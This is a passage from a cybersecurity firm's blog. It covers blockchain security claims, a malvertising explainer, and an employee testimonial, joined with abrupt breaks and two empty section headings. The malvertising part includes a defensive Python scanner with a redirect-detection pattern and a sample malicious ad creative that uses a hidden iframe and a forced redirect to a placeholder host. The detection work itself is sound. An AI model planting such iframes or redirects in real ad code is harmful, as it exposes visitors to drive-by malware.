I. Preventing Fraud and Theft of Data: Blockchain technology provides some of the strongest protection for data against hackers, preventing potential fraud and decreasing the chance of data being stolen or compromised. To destroy or modify a blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, each storing a copy of some or all of the data. Bigger blockchain networks with more users have a far lower risk of being attacked by hackers because of the complexity required to penetrate such a network.

II. Preventing Distributed Denial of Service (DDoS) Attacks: Hackers can use several techniques to launch an attack; the most common is sending a large number of requests or packets to a system until it can no longer process them, leading to failure or a crash. DDoS attacks have been happening with increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means it is still vulnerable: hackers can target the centralized part of DNS and keep taking down one website after another. Implementing blockchain technology would fully decentralize DNS, distributing its contents across a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners), and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.

III. Decentralized Storage Solutions: Data is becoming more valuable than gold and oil. Every business and individual accumulates tons of sensitive data about themselves or their customers. Unfortunately, this data is also quite attractive to hackers, and one of the most convenient things you can do for cybercriminals is to store all of it in one place. Most businesses still use centralized storage for their data. Blockchain-based storage solutions are slowly gaining popularity. One example is Apollo data cloud, developed by the Apollo Currency team, which allows users to archive data on the blockchain and grant third parties permission to access it. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.

Introduction

Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements, and they are one of the common ways to spread malware. Cybercriminals use the advertising channel by posing as legitimate campaigns. Such malvertisements either attempt to download malware directly onto visitors’ systems or devices, or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware through them is called malvertising. Malvertising is a favoured medium for criminals because it takes advantage of consumer trust in both the companies running campaigns and the advertising networks.

Ad networks distribute both genuine and fraudulent advertisements. The reputation of a website does not reliably indicate whether or not it will carry malvertisements, although, that said, reputable sites are still the best place to be to avoid infection. Recent examples have shown that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc. have all been negatively impacted by malvertising campaigns that infected visitors with malware.

Malvertisements vs Adware

People in general confuse malvertisements with adware, as both involve online advertising. Adware is a program running on a victim’s or user’s system, usually bundled with other legitimate software. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.

Key differences between malvertisements and adware are:

1. Malvertisements involve deploying or injecting malicious code on a publisher’s web page. The targeted audience of malvertisements is not individual or selected users, whereas adware is only used to target individual users.

2. Malvertisements are only dangerous to, and only affect, users who view the infected web page or website, whereas adware, once installed, keeps operating on the user’s computer.

How Malvertisement Distribution Works

Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network in the hope that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract viewers and encourage them to click. Once approved by the advertisers, these malicious advertisements are placed on legitimate sites. In some cases, cybercriminals will even re-register expired but previously legitimate domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain unaware because they expect redirects when clicking on an ad. While on the malicious website, code runs in the background that attempts to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitors’ devices directly from the legitimate website that is displaying the ad, without any interaction from visitors.

Malware Insertion Techniques

Attackers use several delivery mechanisms to insert malicious code into advertisements.

1. Malware in advertisement calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker who compromises one of these third-party servers can attach malicious code to the ad payload.

2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending at the ad landing page. If any of the URLs along this delivery path is compromised by an attacker, it may execute malicious code.

3. Malware in text or banner advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript, and the JavaScript may contain malicious code.

4. Malware within a pixel of an image: Pixels are embedded with code in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, they can send a response containing malicious code to the user’s browser.

5. Malware within video: Video players don’t protect against malware. Examples are videos based on Flash or on specific video formats such as VAST. The VAST video format contains pixels from third parties, which could contain malicious code. Flash-based videos can inject an iframe into the page, which downloads malware even without the user clicking on the video. Flash files might also load a pre-roll banner; attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.

Malvertisements: With or Without User Interaction

Common malvertisements generally need user interaction for the malware to be downloaded to, or infect, a victim’s system, for example the victim clicking on an unsafe, malicious advertisement. The following may happen to users who view or interact with malvertisements:

1. Download or installation of malware on the computers or systems viewing those malicious advertisements.

2. Redirection of the user or victim to a malicious site.

Some advanced malvertisements can harm a user without any user interaction. Malvertising might perform the following attacks on users who view the malvertisement without clicking it:

1. A “drive-by download”: installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible by browser vulnerabilities.

2. Forced redirect of the browser to a malicious site.

3. Displaying unwanted advertising, malicious content, or pop-ups beyond the ads legitimately displayed by the ad network. This is done by executing JavaScript.
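As an added example (not part of the original post), a static pre-approval check that an ad network reviewer could run over an HTML5 creative, flagging the delivery vectors described above: third-party script and pixel hosts, iframes, Flash or plugin objects, and redirects performed by meta refresh or by script. The advertiser allowlist, the redirect regex heuristic and the two sample creatives are constructed for this example.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional, Set, Tuple
from urllib.parse import urlparse

# Heuristic: navigation done by script rather than by the creative's ordinary click-through link
REDIRECT_JS = re.compile(r"\b(?:window|top|parent|document)\.location\b|\blocation\.(?:href|replace|assign)\b")


class CreativeScanner(HTMLParser):
    """Walk an HTML5 creative and record the delivery vectors a reviewer should question."""

    def __init__(self, allowed_hosts: Set[str]) -> None:
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings: List[Tuple[str, str]] = []  # (finding kind, offending value)
        self._in_script = False

    def _host_allowed(self, url: Optional[str]) -> bool:
        if not url:
            return True  # no URL, so no third-party host involved
        host = (urlparse(url).hostname or "").lower()
        # Relative references have no host; otherwise the host must be the advertiser's or a subdomain
        return host == "" or any(host == h or host.endswith("." + h) for h in self.allowed_hosts)

    def handle_starttag(self, tag: str, attrs) -> None:
        a = dict(attrs)
        tag = tag.lower()
        if tag == "iframe":
            self.findings.append(("iframe", a.get("src") or ""))
        elif tag in ("object", "embed"):
            self.findings.append(("flash/plugin object", a.get("data") or a.get("src") or ""))
        elif tag == "script":
            self._in_script = True  # inline contents are inspected in handle_data
            src = a.get("src")
            if src and not self._host_allowed(src):
                self.findings.append(("third-party script", src))
        elif tag == "img":
            src = a.get("src")
            if not self._host_allowed(src):
                self.findings.append(("third-party pixel/image", src or ""))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta refresh redirect", a.get("content") or ""))

    def handle_endtag(self, tag: str) -> None:
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data: str) -> None:
        if self._in_script and REDIRECT_JS.search(data):
            self.findings.append(("scripted redirect", data.strip()[:60]))


def scan_creative(html: str, allowed_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Return the findings for one creative; an empty list means nothing to question."""
    scanner = CreativeScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed creatives; .test hosts are reserved names and resolve nowhere
ADVERTISER_HOSTS = {"example-advertiser.test"}

CLEAN_CREATIVE = """<div class="ad">
<img src="https://cdn.example-advertiser.test/banner.png" width="300" height="250">
<a href="https://www.example-advertiser.test/offer">Learn more</a>
<script src="https://cdn.example-advertiser.test/measure.js"></script>
</div>"""

SUSPICIOUS_CREATIVE = """<div class="ad">
<img src="https://cdn.example-advertiser.test/banner.png" width="300" height="250">
<img src="https://track.unknown-party.test/p.gif" width="1" height="1">
<iframe src="https://unknown-party.test/frame.html" width="0" height="0"></iframe>
<script>setTimeout(function () { top.location = "https://unknown-party.test/"; }, 2000);</script>
<object data="https://cdn.example-advertiser.test/preroll.swf"></object>
</div>"""
```

The check is a review aid, not a substitute for sandboxed rendering: a creative whose script fetches its payload later will show nothing here.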

Identification of Malvertisements

Malvertisements Mitigations and Best Practices

What is your name and job title in CyRAACS?

My name is Anamika, I lead the Application security VAPT projects in CyRAACS.

How would you summarize what you do? Why is CyRAACS a great place to work?

At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT systems, web applications, mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications, web services, and APIs to minimize exposure to attacks.

I am responsible for communicating with client teams often to explain and demonstrate vulnerabilities to application/system owners and to assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.

How long have you worked with CyRAACS?

I have had the pleasure of working at CyRAACS for nearly 3 years now.

What is the most interesting thing about working in CyRAACS, and about the work you do?

CyRAACS follows a no-hierarchy model wherein the management keeps its doors open to promote new ideas and transparency of information within the organization.

My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.

My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to making CyRAACS a big success story in the coming years.

What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?

My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.

CyRAACS has helped me achieve my professional goal by sponsoring my certification.

I have learned over these years about my own domain, but there has also been a lot of cross-functional learning which has helped in overall growth in my career.

At CyRAACS, individuals come in at different levels with different skill sets, expertise, aspirations, and attitudes. Here, at CyRAACS we learn to think independently, be focused, and push ourselves out of our comfort zone. This is a company that adds significant value to each employee, and it helps each individual reach her or his highest potential.

I am proud and humbled to be amongst such incredibly talented people and I am thankful for the opportunity to contribute to our continued success.

What are your thoughts about the company’s vision and direction, and your role in helping CyRAACS achieve them?

Management at CyRAACS has always been transparent about what they are doing to achieve the company’s vision and has ensured that we are kept aware of the progress the company is making.

When I see my leaders working hard to live the standards of the vision, I feel equally motivated to do the same. I believe that we should be accountable for meeting our own goals and doing our part to achieve the company’s vision and direction.

I agree with the fact that transparency is great for the company's vision, but it is also a good way to build trust with employees and customers. Staying transparent about the failures and successes of the company will help your employees be more engaged and productive.

What advice would you give a job seeker who’s thinking about applying for a job with CyRAACS?

My advice to job seekers would be if you are looking for a challenging, fast-growing environment with opportunities to learn cross-functional skills, CyRAACS is a one-stop for you.

Specifically, for freshers, this is a great place to start their career because here you are mentored at every step to push yourself and uncover your true professional self.

The culture is transparent, every employee, irrespective of their position, is given a chance to be heard, and there are ample opportunities available to those who want to build a career here.

When you tell people about your job, what’s one thing that surprises them, or gets them excited about the work you do?

As the first job is considered the most important point in anyone’s career path, CyRAACS proved to be the right tipping point for me. I joined as a fresh MBA graduate.

Early in my career, I was given a chance to handle a separate developing service line – Application security and I was trusted with the responsibility of handling stakeholders on my own. The whole experience has been a great learning opportunity for me.

My growth graph has been exponential as the management here has been very supportive and has given me ample learning opportunities with meaningful rewards and recognition.

Your achievements, value provided to clients, client empathy, etc.

I have successfully completed 150+ projects with more than 50% repeat engagements.

Client achievement and empathy: I have received excellent recommendations from the majority of my clients, highlighting the quality of deliverables, meeting deadlines, and going beyond the set expectations, from industry sectors such as banking, IT services, healthcare, and telecommunications.

On request from one of our clients, a tax consulting multinational company that had to make their application go live, we were given a strict deadline to complete the said task. Conducting VAPT and helping the client secure their application was one of the major responsibilities I abided by. The client was very happy with the engagement and in turn suggested that their internal departments conduct VAPT for their other applications.

An overnight audit requirement for one of our clients operating in the small finance bank sector was a crucial task to be completed. A time constraint of 1 day was given to retest 10 applications. I took it as a challenge, pushed myself to meet the said timelines, and completed the task by leading my team. The client in return extended their empanelment contract with us as their security partner.

For client-specific challenges, such as when their application is inaccessible or new functionality is introduced within the application, we have ensured that we accommodate such requests and perform multiple rounds of testing to make certain that all the functionalities of the application are tested and the application is secure to go live in production. Clients have considered this a key value provided to them, appreciating our extra efforts.

On request from one of our clients, an IT services company, we had to conduct VAPT for their application and infrastructure components, for which they had a strict government deadline to abide by. This request was given priority, and I had to drive it to completion within the said timelines. The client gave positive feedback on the engagement and, as a result, referred us to other partner companies.

Achievements and Certifications

Client success stories

Repeat clients – Our quality output and focussed approach has made CyRAACS an empanelled security partner for many of the client projects led by me across various industry sectors such as Finance, Banking, IT services, Healthcare, Telecommunications.

Referrals – Many of our clients have given referrals to their other partner companies for CyRAACS as a security vendor.

May 16, 2022: Why Security Architecture Review is important for Cyber Security?
March 10, 2021: Top 5 Benefits of Cloud Infrastructure Security 2021
February 10, 2021: Five Board Questions That Security and Risk Leaders Must Be Prepared To Answer
January 1, 2021: New Year 2021 Resolution for the CISO
December 10, 2020: Best Practices For Conducting Cybersecurity Audits In Crisis Situation
November 10, 2020: Privilege Escalation by Exploiting WordPress Vulnerability
October 10, 2020: Blockchain Implementation in Cyber Security and Cyber Forensics
September 10, 2020: Malvertisements
August 10, 2020: Employee Testimonial: Anamika Patil
© COPYRIGHT 2022, ALL RIGHTS RESERVED